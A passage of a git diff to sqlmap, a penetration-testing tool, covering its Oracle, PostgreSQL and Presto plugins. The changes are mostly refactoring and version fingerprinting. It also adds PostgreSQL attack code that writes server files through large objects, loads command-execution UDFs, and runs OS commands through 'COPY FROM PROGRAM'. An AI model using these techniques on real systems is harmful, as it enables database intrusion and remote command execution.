CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + >>> Syntax.escape(u"SELECT 'abcd\xebfgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||NCHR(235)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + def escaper(value): - return "||".join("%s(%d)" % ("CHR" if ord(value[i]) < 256 else "NCHR", ord(value[i])) for i in xrange(len(value))) + return "||".join("%s(%d)" % ("CHR" if _ < 128 else "NCHR", _) for _ in getOrds(value)) return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/oracle/takeover.py b/plugins/dbms/oracle/takeover.py index b47e1fbcecf..6bc5cd16a24 100644 --- a/plugins/dbms/oracle/takeover.py +++ b/plugins/dbms/oracle/takeover.py @@ -1,17 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.takeover import Takeover as GenericTakeover class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - def osCmd(self): errMsg = "Operating system command execution functionality not " errMsg += "yet implemented for Oracle" diff --git a/plugins/dbms/postgresql/__init__.py b/plugins/dbms/postgresql/__init__.py index 0688fc29b85..68ea7cb1f7c 100644 --- a/plugins/dbms/postgresql/__init__.py +++ b/plugins/dbms/postgresql/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,18 +23,14 @@ class PostgreSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, def __init__(self): self.excludeDbsList = PGSQL_SYSTEM_DBS self.sysUdfs = { - # UDF name: UDF parameters' input data-type and return data-type - "sys_exec": { "input": ["text"], "return": "int4" }, - "sys_eval": { "input": ["text"], "return": "text" }, - "sys_bineval": { "input": ["text"], "return": "int4" }, - "sys_fileread": { "input": ["text"], "return": "text" } - } + # UDF name: UDF parameters' input data-type and return data-type + "sys_exec": {"input": ["text"], "return": "int4"}, + "sys_eval": {"input": ["text"], "return": "text"}, + "sys_bineval": {"input": ["text"], "return": "int4"}, + "sys_fileread": {"input": ["text"], "return": "text"} + } - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.PGSQL] = Syntax.escape diff --git a/plugins/dbms/postgresql/connector.py b/plugins/dbms/postgresql/connector.py index 1caf426029c..4a71bf15bb6 100644 --- a/plugins/dbms/postgresql/connector.py +++ b/plugins/dbms/postgresql/connector.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: @@ -10,9 +10,10 @@ import psycopg2.extensions psycopg2.extensions.register_type(psycopg2.extensions.UNICODE) psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY) -except ImportError: +except: pass +from lib.core.common import getSafeExString from lib.core.data import logger from lib.core.exception import SqlmapConnectionException from plugins.generic.connector import Connector as GenericConnector @@ -28,27 +29,24 @@ class Connector(GenericConnector): Possible connectors: http://wiki.python.org/moin/PostgreSQL """ - def __init__(self): - GenericConnector.__init__(self) - def connect(self): self.initConnection() try: self.connector = psycopg2.connect(host=self.hostname, user=self.user, password=self.password, database=self.db, port=self.port) - except psycopg2.OperationalError, msg: - raise SqlmapConnectionException(msg) + except (psycopg2.OperationalError, UnicodeDecodeError) as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.connector.set_client_encoding('UNICODE') self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except psycopg2.ProgrammingError, msg: - logger.warn(msg) + except psycopg2.ProgrammingError as ex: + logger.warning(getSafeExString(ex)) return None def execute(self, query): @@ -57,10 +55,10 @@ def execute(self, query): try: self.cursor.execute(query) retVal = True - except (psycopg2.OperationalError, psycopg2.ProgrammingError), msg: - logger.warn(("(remote) %s" % msg).strip()) - except psycopg2.InternalError, msg: - raise SqlmapConnectionException(msg) + except (psycopg2.OperationalError, psycopg2.ProgrammingError) as ex: + logger.warning(("(remote) '%s'" % getSafeExString(ex)).strip()) + except psycopg2.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.connector.commit() diff --git a/plugins/dbms/postgresql/enumeration.py b/plugins/dbms/postgresql/enumeration.py index 5db5886e11d..181384becbc 100644 --- a/plugins/dbms/postgresql/enumeration.py +++ b/plugins/dbms/postgresql/enumeration.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.data import logger @@ -10,9 +10,6 @@ from plugins.generic.enumeration import Enumeration as GenericEnumeration class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - def getHostname(self): warnMsg = "on PostgreSQL it is not possible to enumerate the hostname" - logger.warn(warnMsg) + logger.warning(warnMsg) diff --git a/plugins/dbms/postgresql/filesystem.py b/plugins/dbms/postgresql/filesystem.py index 6c3e8e38577..d0298f2b627 100644 --- a/plugins/dbms/postgresql/filesystem.py +++ b/plugins/dbms/postgresql/filesystem.py @@ -1,68 +1,51 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os from lib.core.common import randomInt +from lib.core.compat import xrange from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapUnsupportedFeatureException +from lib.core.settings import LOBLKSIZE from lib.request import inject from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): def __init__(self): self.oid = None + self.page = None GenericFilesystem.__init__(self) - def stackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) + def stackedReadFile(self, remoteFile): + if not kb.bruteMode: + infoMsg = "fetching file: '%s'" % remoteFile + logger.info(infoMsg) self.initEnv() - return self.udfEvalCmd(cmd=rFile, udfName="sys_fileread") + return self.udfEvalCmd(cmd=remoteFile, udfName="sys_fileread") - def unionWriteFile(self, wFile, dFile, fileType): + def unionWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False): errMsg = "PostgreSQL does not support file upload with UNION " errMsg += "query SQL injection technique" raise SqlmapUnsupportedFeatureException(errMsg) - def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): - wFileSize = os.path.getsize(wFile) - - if wFileSize > 8192: - errMsg = "on PostgreSQL it is not possible to write files " - errMsg += "bigger than 8192 bytes at the moment" - raise SqlmapUnsupportedFeatureException(errMsg) + def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): + localFileSize = os.path.getsize(localFile) + content = open(localFile, "rb").read() self.oid = randomInt() - - debugMsg = "creating a support table to write the base64 " - debugMsg += "encoded file to" - logger.debug(debugMsg) + self.page = 0 self.createSupportTbl(self.fileTblName, self.tblField, "text") - logger.debug("encoding file to its base64 string value") - fcEncodedList = self.fileEncode(wFile, "base64", False) - - debugMsg = "forging SQL statements to write the base64 " - debugMsg += "encoded file to the support table" - logger.debug(debugMsg) - - sqlQueries = self.fileToSqlQueries(fcEncodedList) - - logger.debug("inserting the base64 encoded file to the support table") - - for sqlQuery in sqlQueries: - inject.goStacked(sqlQuery) - debugMsg = "create a new OID for a large object, it implicitly " debugMsg += "adds an entry in the large objects system table" logger.debug(debugMsg) @@ -70,47 +53,30 @@ def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): # References: # http://www.postgresql.org/docs/8.3/interactive/largeobjects.html # http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html + inject.goStacked("SELECT lo_unlink(%d)" % self.oid) inject.goStacked("SELECT lo_create(%d)" % self.oid) + inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid) - debugMsg = "updating the system large objects table assigning to " - debugMsg += "the just created OID the binary (base64 decoded) UDF " - debugMsg += "as data" - logger.debug(debugMsg) + for offset in xrange(0, localFileSize, LOBLKSIZE): + fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False) + sqlQueries = self.fileToSqlQueries(fcEncodedList) + + for sqlQuery in sqlQueries: + inject.goStacked(sqlQuery) + + inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, %d, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.page, self.tblField, self.fileTblName)) + inject.goStacked("DELETE FROM %s" % self.fileTblName) - # Refereces: - # * http://www.postgresql.org/docs/8.3/interactive/catalog-pg-largeobject.html - # * http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql - # - # NOTE: From PostgreSQL site: - # - # "The data stored in the large object will never be more than - # LOBLKSIZE bytes and might be less which is BLCKSZ/4, or - # typically 2 Kb" - # - # As a matter of facts it was possible to store correctly a file - # large 13776 bytes, the problem arises at next step (lo_export()) - # - # Inject manually into PostgreSQL system table pg_largeobject the - # base64-decoded file content. Note that PostgreSQL >= 9.0 does - # not accept UPDATE into that table for some reason. - self.getVersionFromBanner() - banVer = kb.bannerFp["dbmsVersion"] - - if banVer >= "9.0": - inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, 0, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.tblField, self.fileTblName)) - else: - inject.goStacked("UPDATE pg_largeobject SET data=(DECODE((SELECT %s FROM %s), 'base64')) WHERE loid=%d" % (self.tblField, self.fileTblName, self.oid)) + self.page += 1 debugMsg = "exporting the OID %s file content to " % fileType - debugMsg += "file '%s'" % dFile + debugMsg += "file '%s'" % remoteFile logger.debug(debugMsg) - # NOTE: lo_export() exports up to only 8192 bytes of the file - # (pg_largeobject 'data' field) - inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, dFile), silent=True) + inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, remoteFile), silent=True) - written = self.askCheckWrittenFile(wFile, dFile, forceCheck) + written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) inject.goStacked("SELECT lo_unlink(%d)" % self.oid) diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index d92dfcfbd4e..20eed02a917 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py @@ -1,22 +1,23 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend from lib.core.common import Format -from lib.core.common import getUnicode -from lib.core.common import randomInt +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS +from lib.core.enums import FORK +from lib.core.enums import HASHDB_KEYS from lib.core.enums import OS from lib.core.session import setDbms from lib.core.settings import PGSQL_ALIASES -from lib.core.settings import PGSQL_SYSTEM_DBS from lib.request import inject from plugins.generic.fingerprint import Fingerprint as GenericFingerprint @@ -25,6 +26,30 @@ def __init__(self): GenericFingerprint.__init__(self, DBMS.PGSQL) def getFingerprint(self): + fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) + + if fork is None: + if inject.checkBooleanExpression("VERSION() LIKE '%CockroachDB%'"): + fork = FORK.COCKROACHDB + elif inject.checkBooleanExpression("VERSION() LIKE '%Redshift%'"): # Reference: https://dataedo.com/kb/query/amazon-redshift/check-server-version + fork = FORK.REDSHIFT + elif inject.checkBooleanExpression("VERSION() LIKE '%Greenplum%'"): # Reference: http://www.sqldbpros.com/wordpress/wp-content/uploads/2014/08/what-version-of-greenplum.png + fork = FORK.GREENPLUM + elif inject.checkBooleanExpression("VERSION() LIKE '%Yellowbrick%'"): # Reference: https://www.yellowbrick.com/docs/3.3/ybd_sqlref/version.html + fork = FORK.YELLOWBRICK + elif inject.checkBooleanExpression("VERSION() LIKE '%EnterpriseDB%'"): # Reference: https://www.enterprisedb.com/edb-docs/d/edb-postgres-advanced-server/user-guides/user-guide/11/EDB_Postgres_Advanced_Server_Guide.1.087.html + fork = FORK.ENTERPRISEDB + elif inject.checkBooleanExpression("VERSION() LIKE '%YB-%'"): # Reference: https://github.com/yugabyte/yugabyte-db/issues/2447#issue-499562926 + fork = FORK.YUGABYTEDB + elif inject.checkBooleanExpression("VERSION() LIKE '%openGauss%'"): + fork = FORK.OPENGAUSS + elif inject.checkBooleanExpression("AURORA_VERSION() LIKE '%'"): # Reference: https://aws.amazon.com/premiumsupport/knowledge-center/aurora-version-number/ + fork = FORK.AURORA + else: + fork = "" + + hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork) + value = "" wsOsFp = Format.getOs("web server", kb.headersFp) @@ -41,6 +66,8 @@ def getFingerprint(self): if not conf.extensiveFp: value += DBMS.PGSQL + if fork: + value += " (%s fork)" % fork return value actVer = Format.getDbms() @@ -48,25 +75,30 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() if htmlErrorFp: value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + if fork: + value += "\n%sfork fingerprint: %s" % (blank, fork) + return value def checkDbms(self): """ References for fingerprint: - * http://www.postgresql.org/docs/9.1/interactive/release.html (up to 9.1.3) + * https://www.postgresql.org/docs/current/static/release.html """ - if not conf.extensiveFp and (Backend.isDbmsWithin(PGSQL_ALIASES) or conf.dbms in PGSQL_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES): setDbms(DBMS.PGSQL) self.getBanner() @@ -76,18 +108,18 @@ def checkDbms(self): infoMsg = "testing %s" % DBMS.PGSQL logger.info(infoMsg) - randInt = getUnicode(randomInt(1)) - result = inject.checkBooleanExpression("%s::int=%s" % (randInt, randInt)) + # NOTE: Vertica works too without the CONVERT_TO() + result = inject.checkBooleanExpression("CONVERT_TO('[RANDSTR]', QUOTE_IDENT(NULL)) IS NULL") if result: infoMsg = "confirming %s" % DBMS.PGSQL logger.info(infoMsg) - result = inject.checkBooleanExpression("COALESCE(%s, NULL)=%s" % (randInt, randInt)) + result = inject.checkBooleanExpression("COALESCE([RANDNUM], NULL)=[RANDNUM]") if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL - logger.warn(warnMsg) + logger.warning(warnMsg) return False @@ -101,37 +133,63 @@ def checkDbms(self): infoMsg = "actively fingerprinting %s" % DBMS.PGSQL logger.info(infoMsg) - if inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"): - Backend.setVersion(">= 9.1.0") - elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1, 'EEEE'))>0"): + if inject.checkBooleanExpression("JSON_QUERY(NULL::jsonb, '$') IS NULL"): + Backend.setVersion(">= 17.0") + elif inject.checkBooleanExpression("RANDOM_NORMAL(0.0, 1.0) IS NOT NULL"): + Backend.setVersion(">= 16.0") + elif inject.checkBooleanExpression("REGEXP_COUNT(NULL,NULL) IS NULL"): + Backend.setVersion(">= 15.0") + elif inject.checkBooleanExpression("BIT_COUNT(NULL) IS NULL"): + Backend.setVersion(">= 14.0") + elif inject.checkBooleanExpression("NULL::anycompatible IS NULL"): + Backend.setVersion(">= 13.0") + elif inject.checkBooleanExpression("SINH(0)=0"): + Backend.setVersion(">= 12.0") + elif inject.checkBooleanExpression("SHA256(NULL) IS NULL"): + Backend.setVersion(">= 11.0") + elif inject.checkBooleanExpression("XMLTABLE(NULL) IS NULL"): + Backend.setVersionList([">= 10.0", "< 11.0"]) + elif inject.checkBooleanExpression("SIND(0)=0"): + Backend.setVersionList([">= 9.6.0", "< 10.0"]) + elif inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"): + Backend.setVersionList([">= 9.5.0", "< 9.6.0"]) + elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"): + Backend.setVersionList([">= 9.4.0", "< 9.5.0"]) + elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"): + Backend.setVersionList([">= 9.3.0", "< 9.4.0"]) + elif inject.checkBooleanExpression("ROW_TO_JSON(NULL) IS NULL"): + Backend.setVersionList([">= 9.2.0", "< 9.3.0"]) + elif inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"): + Backend.setVersionList([">= 9.1.0", "< 9.2.0"]) + elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"): Backend.setVersionList([">= 9.0.0", "< 9.1.0"]) - elif inject.checkBooleanExpression("2=(SELECT DIV(6, 3))"): + elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"): Backend.setVersionList([">= 8.4.0", "< 9.0.0"]) elif inject.checkBooleanExpression("EXTRACT(ISODOW FROM CURRENT_TIMESTAMP)<8"): Backend.setVersionList([">= 8.3.0", "< 8.4.0"]) elif inject.checkBooleanExpression("ISFINITE(TRANSACTION_TIMESTAMP())"): Backend.setVersionList([">= 8.2.0", "< 8.3.0"]) - elif inject.checkBooleanExpression("9=(SELECT GREATEST(5, 9, 1))"): + elif inject.checkBooleanExpression("9=(SELECT GREATEST(5,9,1))"): Backend.setVersionList([">= 8.1.0", "< 8.2.0"]) - elif inject.checkBooleanExpression("3=(SELECT WIDTH_BUCKET(5.35, 0.024, 10.06, 5))"): + elif inject.checkBooleanExpression("3=(SELECT WIDTH_BUCKET(5.35,0.024,10.06,5))"): Backend.setVersionList([">= 8.0.0", "< 8.1.0"]) - elif inject.checkBooleanExpression("'d'=(SELECT SUBSTR(MD5('sqlmap'), 1, 1))"): + elif inject.checkBooleanExpression("'d'=(SELECT SUBSTR(MD5('sqlmap'),1,1))"): Backend.setVersionList([">= 7.4.0", "< 8.0.0"]) - elif inject.checkBooleanExpression("'p'=(SELECT SUBSTR(CURRENT_SCHEMA(), 1, 1))"): + elif inject.checkBooleanExpression("'p'=(SELECT SUBSTR(CURRENT_SCHEMA(),1,1))"): Backend.setVersionList([">= 7.3.0", "< 7.4.0"]) elif inject.checkBooleanExpression("8=(SELECT BIT_LENGTH(1))"): Backend.setVersionList([">= 7.2.0", "< 7.3.0"]) - elif inject.checkBooleanExpression("'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'), 2, 1))"): + elif inject.checkBooleanExpression("'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'),2,1))"): Backend.setVersionList([">= 7.1.0", "< 7.2.0"]) - elif inject.checkBooleanExpression("8=(SELECT POW(2, 3))"): + elif inject.checkBooleanExpression("8=(SELECT POW(2,3))"): Backend.setVersionList([">= 7.0.0", "< 7.1.0"]) elif inject.checkBooleanExpression("'a'=(SELECT MAX('a'))"): Backend.setVersionList([">= 6.5.0", "< 6.5.3"]) elif inject.checkBooleanExpression("VERSION()=VERSION()"): Backend.setVersionList([">= 6.4.0", "< 6.5.0"]) - elif inject.checkBooleanExpression("2=(SELECT SUBSTR(CURRENT_DATE, 1, 1))"): + elif inject.checkBooleanExpression("2=(SELECT SUBSTR(CURRENT_DATE,1,1))"): Backend.setVersionList([">= 6.3.0", "< 6.4.0"]) - elif inject.checkBooleanExpression("'s'=(SELECT SUBSTRING('sqlmap', 1, 1))"): + elif inject.checkBooleanExpression("'s'=(SELECT SUBSTRING('sqlmap',1,1))"): Backend.setVersionList([">= 6.2.0", "< 6.3.0"]) else: Backend.setVersion("< 6.2.0") @@ -139,7 +197,7 @@ def checkDbms(self): return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL - logger.warn(warnMsg) + logger.warning(warnMsg) return False @@ -173,13 +231,3 @@ def checkDbmsOs(self, detailed=False): logger.info(infoMsg) self.cleanup(onlyFileTbl=True) - - def forceDbmsEnum(self): - if conf.db not in PGSQL_SYSTEM_DBS and conf.db != "public": - conf.db = "public" - - warnMsg = "on %s it is possible to enumerate " % DBMS.PGSQL - warnMsg += "only on the current schema and/or system databases. " - warnMsg += "sqlmap is going to use 'public' schema as a " - warnMsg += "database name" - logger.warn(warnMsg) diff --git a/plugins/dbms/postgresql/syntax.py b/plugins/dbms/postgresql/syntax.py index 6b887a7730c..f730a800107 100644 --- a/plugins/dbms/postgresql/syntax.py +++ b/plugins/dbms/postgresql/syntax.py @@ -1,24 +1,25 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): """ Note: PostgreSQL has a general problem with concenation operator (||) precedence (hence the parentheses enclosing) e.g. SELECT 1 WHERE 'a'!='a'||'b' will trigger error ("argument of WHERE must be type boolean, not type text") + + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT (CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104)) FROM foobar" + True """ def escaper(value): - return "(%s)" % "||".join("CHR(%d)" % ord(_) for _ in value) # Postgres CHR() function already accepts Unicode code point of character(s) + return "(%s)" % "||".join("CHR(%d)" % _ for _ in getOrds(value)) # Postgres CHR() function already accepts Unicode code point of character(s) return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py index 5c3c10cca9d..ea187fc79b0 100644 --- a/plugins/dbms/postgresql/takeover.py +++ b/plugins/dbms/postgresql/takeover.py @@ -1,24 +1,32 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import os + from lib.core.common import Backend +from lib.core.common import checkFile +from lib.core.common import decloakToTemp +from lib.core.common import flattenValue +from lib.core.common import filterNone +from lib.core.common import isListLike +from lib.core.common import isNoneValue +from lib.core.common import isStackingAvailable from lib.core.common import randomStr +from lib.core.compat import LooseVersion from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.enums import OS +from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUnsupportedFeatureException from lib.request import inject from plugins.generic.takeover import Takeover as GenericTakeover class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - def udfSetRemotePath(self): # On Windows if Backend.isOs(OS.WINDOWS): @@ -43,24 +51,31 @@ def udfSetLocalPaths(self): banVer = kb.bannerFp["dbmsVersion"] - if banVer >= "9.0": - majorVer = "9.0" - elif banVer >= "8.4": - majorVer = "8.4" - elif banVer >= "8.3": - majorVer = "8.3" - elif banVer >= "8.2": - majorVer = "8.2" + if not banVer or not banVer[0].isdigit(): + errMsg = "unsupported feature on unknown version of PostgreSQL" + raise SqlmapUnsupportedFeatureException(errMsg) + elif LooseVersion(banVer) >= LooseVersion("10"): + majorVer = banVer.split('.')[0] + elif LooseVersion(banVer) >= LooseVersion("8.2") and '.' in banVer: + majorVer = '.'.join(banVer.split('.')[:2]) else: errMsg = "unsupported feature on versions of PostgreSQL before 8.2" raise SqlmapUnsupportedFeatureException(errMsg) - if Backend.isOs(OS.WINDOWS): - self.udfLocalFile += "/postgresql/windows/%d/%s/lib_postgresqludf_sys.dll" % (Backend.getArch(), majorVer) - self.udfSharedLibExt = "dll" - else: - self.udfLocalFile += "/postgresql/linux/%d/%s/lib_postgresqludf_sys.so" % (Backend.getArch(), majorVer) - self.udfSharedLibExt = "so" + try: + if Backend.isOs(OS.WINDOWS): + _ = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll_") + checkFile(_) + self.udfLocalFile = decloakToTemp(_) + self.udfSharedLibExt = "dll" + else: + _ = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so_") + checkFile(_) + self.udfLocalFile = decloakToTemp(_) + self.udfSharedLibExt = "so" + except SqlmapSystemException: + errMsg = "unsupported feature on PostgreSQL %s (%s-bit)" % (majorVer, Backend.getArch()) + raise SqlmapUnsupportedFeatureException(errMsg) def udfCreateFromSharedLib(self, udf, inpRet): if udf in self.udfToCreate: @@ -81,3 +96,34 @@ def uncPathRequest(self): self.createSupportTbl(self.fileTblName, self.tblField, "text") inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True) self.cleanup(onlyFileTbl=True) + + def copyExecCmd(self, cmd): + output = None + + if isStackingAvailable(): + # Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5 + self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName + self._forgedCmd += "CREATE TABLE %s(%s text);" % (self.cmdTblName, self.tblField) + self._forgedCmd += "COPY %s FROM PROGRAM '%s';" % (self.cmdTblName, cmd.replace("'", "''")) + inject.goStacked(self._forgedCmd) + + query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName) + output = inject.getValue(query, resumeValue=False) + + if isListLike(output): + output = flattenValue(output) + output = filterNone(output) + + if not isNoneValue(output): + output = os.linesep.join(output) + + self._cleanupCmd = "DROP TABLE %s" % self.cmdTblName + inject.goStacked(self._cleanupCmd) + + return output + + def checkCopyExec(self): + if kb.copyExecTest is None: + kb.copyExecTest = self.copyExecCmd("echo 1") == '1' + + return kb.copyExecTest diff --git a/plugins/dbms/presto/__init__.py b/plugins/dbms/presto/__init__.py new file mode 100644 index 00000000000..4fe48fc89ac --- /dev/null +++ b/plugins/dbms/presto/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import PRESTO_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.presto.enumeration import Enumeration +from plugins.dbms.presto.filesystem import Filesystem +from plugins.dbms.presto.fingerprint import Fingerprint +from plugins.dbms.presto.syntax import Syntax +from plugins.dbms.presto.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class PrestoMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Presto methods + """ + + def __init__(self): + self.excludeDbsList = PRESTO_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.PRESTO] = Syntax.escape diff --git a/plugins/dbms/presto/connector.py b/plugins/dbms/presto/connector.py new file mode 100644 index 00000000000..f190c7ce2ea --- /dev/null +++ b/plugins/dbms/presto/connector.py @@ -0,0 +1,70 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import prestodb +except: + pass + +import logging +import struct + +from lib.core.common import getSafeExString +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://github.com/prestodb/presto-python-client + User guide: https://github.com/prestodb/presto-python-client/blob/master/README.md + API: https://www.python.org/dev/peps/pep-0249/ + PyPI package: presto-python-client + License: Apache License 2.0 + """ + + def connect(self): + self.initConnection() + + try: + self.connector = prestodb.dbapi.connect(host=self.hostname, user=self.user, catalog=self.db, port=self.port, request_timeout=conf.timeout) + except (prestodb.exceptions.OperationalError, prestodb.exceptions.InternalError, prestodb.exceptions.ProgrammingError, struct.error) as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except prestodb.exceptions.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + retVal = False + + try: + self.cursor.execute(query) + retVal = True + except (prestodb.exceptions.OperationalError, prestodb.exceptions.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except prestodb.exceptions.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.connector.commit() + + return retVal + + def select(self, query): + retVal = None + + if self.execute(query): + retVal = self.fetchall() + + return retVal diff --git a/plugins/dbms/presto/enumeration.py b/plugins/dbms/presto/enumeration.py new file mode 100644 index 00000000000..aad5d4bcad5 --- /dev/null +++ 